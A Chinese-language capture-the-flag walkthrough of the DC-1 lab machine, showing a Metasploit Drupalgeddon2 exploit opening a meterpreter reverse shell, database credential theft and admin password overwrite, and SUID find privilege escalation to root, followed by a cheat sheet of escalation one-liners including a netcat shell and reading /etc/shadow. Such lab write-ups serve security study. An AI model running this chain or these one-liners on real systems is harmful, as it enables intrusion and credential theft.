DC-1
kali:192.168.32.135
靶机:192.168.32.140
arp-scan -l
扫描到主机的ip
,nmap扫描端口,nmap -sV -p- 192.168.32.140
root@kali:~# nmap -sV -p- 192.168.32.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 09:36 EDT
Nmap scan report for 192.168.32.140
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
52962/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:03:D1:4E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/su
Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds
发现存在web服务,访问后云悉得到信息:
内容管理系统(CMS) Drupal 7
Web服务器 Apache 2.2.22
编程语言 PHP 5.4.45
操作系统 Debian
JavaScript库 jQuery 1.4.4
MSF大法好啊!直接搜索drupal的可利用漏洞,共出现7个,选择新一点会比较保险,18年的比较ok
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.32.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.32.140
rhost => 192.168.32.140
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.32.135:4444
[*] Sending stage (38288 bytes) to 192.168.32.140
[*] Meterpreter session 1 opened (192.168.32.135:4444 -> 192.168.32.140:58870) at 2020-07-28 09:15:03 -0400
出现meterpreter >
说明成功弹回shell
, 执行python -c 'import pty;pty.spawn("/bin/bash")'
获得一个交互式的Teriminal
,继续推进,查看当前目录下的文件
www-data@DC-1:/var/www$ ls
ls
COPYRIGHT.txt LICENSE.txt cron.php misc sites
INSTALL.mysql.txt MAINTAINERS.txt flag1.txt modules themes
INSTALL.pgsql.txt README.txt includes profiles update.php
INSTALL.sqlite.txt UPGRADE.txt index.php robots.txt web.config
INSTALL.txt authorize.php install.php scripts xmlrpc.php
有flag1.txt
,cat
一下。
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
让我找config
类的文件,而且是CMS
里的,万年不变懒狗特技,find
命令,顺带了解到Drupal的默认设置文件交settings.php
www-data@DC-1:/var/www$ find -name 'settings.php'
find -name 'settings.php'
./sites/default/settings.php
www-data@DC-1:/var/www$ cat ./sites/default/settings.php
cat ./sites/default/settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
......
发现flag2
,翻译后得暴力和字典攻击并不是获得访问权限的唯一方法(而且您需要访问权限)。你将如何处理这些数据?在文件中还看到了数据库的相关信息,并且有一个低权限的账号。
www-data@DC-1:/var/www$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
登录之后,先不说能不能提权,先要做一件我一直想做不敢做的事情,就是脱裤。(此处略过)
//查看一下数据库
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| ...... |
| users |
| ...... |
+-----------------------------+
80 rows in set (0.00 sec)
该数据库内存在巨多的表,先查看user
表
mysql> select * from users;
select * from users;
uid | name | pass |
---|---|---|
0 | ||
1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
表中有两个账号,应该是drupal
的账号,但是密码经过特殊的加密无法查看,看了大手子们的文章后了解到可以结合drupal
的加密文件修改密码,具体操作如下:
www-data@DC-1:/var/www$ cd scripts
cd scripts
www-data@DC-1:/var/www/scripts$ cp -r ../includes ./
cp -r ../includes ./
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh drupal.sh generate-d6-content.sh password-hash.sh
cron-curl.sh dump-database-d6.sh generate-d7-content.sh run-tests.sh
cron-lynx.sh dump-database-d7.sh includes test.script
www-data@DC-1:/var/www/scripts$ ./password-hash.sh Tr0jAn
./password-hash.sh Tr0jAn
password: Tr0jAn hash: $S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5
得到Tr0jAn
加密后的hash值,进入数据库更新密码
mysql> update users set pass = '$S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5' where name = 'admin';
<nwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5' where name = 'admin';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
此时可以回去登录了。
在Dashboard
看到了flag3
内容如下:Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
反正大致意思就是告诉我需要怎么的找到密码,但是我需要exec
和shadow
(一脸懵逼.jpg
(又是看了大手子们的文章之后)此时需要先cat一下密码文件瞅瞅
www-data@DC-1:/var/www$ cat /etc/passwd
......
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
看到了flag4
,去这个文件夹看看flag4
www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls
ls
flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
这是提醒我该提权了,这激动人心的时刻终于到来了。
SUID提权-find命令之exec
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。
常见具有提权的Linux可执行文件包括:Nmap,Vim,find,Bash,More,Less,Nano,cp;
利用find
命令可以找到系统上正在运行的所有SUID
可执行文件,但我们的目的是找出具有SUID
权限位且属于root
用户的文件,然后将所有错误重定向到/dev/null
,从而仅列出该用户具有访问权限的那些二进制文件。
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
/ 表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u=s 表示查找root用户拥有的文件
-type 表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2 表示该进程的第二个文件描述符,即stderr(标准错误)
> 表示重定向
/dev/null 是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。
www-data@DC-1:/$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
执行结果中有find
命令,对其进行利用提权
www-data@DC-1:/$ find ./ Tr0jAn -exec '/bin/sh' \;
# whoami
whoami
root
# find / -name '*flag*.txt'
find / -name '*flag*.txt'
/home/flag4/flag4.txt
/var/www/flag1.txt
/root/thefinalflag.txt
# cat /root/thefinalflag.txt
cat /root/thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
至此,DC-1的攻击已经全部完成了,但是在实战过程中,我们在MSF
一把梭之后,应该进行shell
升级,将其变成更稳定的后门,谨防被杀掉。
常见SUID提权命令
关于什么是SUID
,我再这之外的一篇文章里写过了,忘了就再看看。
上面已经写过了用find命令查找具有SUID权限的文件的命令,这儿就不再赘述了。
vim
vim.tiny
#Press ESC key
:set shell=/bin/sh
:shell
find
find ./ Tr0jAn -exec '/bin/sh' \;
find+netcat
find Tr0jAn -exec netcat -lvp [Port] -e /bin/sh \;
netcat {ip:port}
bash
bash -p
less
less /etc/passwd
!/bin/sh
more
more /etc/passwd
!/bin/sh
ash、linux shell
sudo ash
awk
awk 'BEGIN {system("/bin/bash")}'
man
man passwd
!/bin/bash
python
import os
os.system("/bin/bash")
perl、ruby、lua、etc
exec "/bin/bash"
tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.Tr0jAn
chmod +x /tmp/.Tr0jAn
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.Tr0jAn -Z root
cp
sudo sh -c 'cp $(which cp) .; chmod +s ./cp'
chmod
sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod'
想想你的文章写的特别好https://www.237fa.com/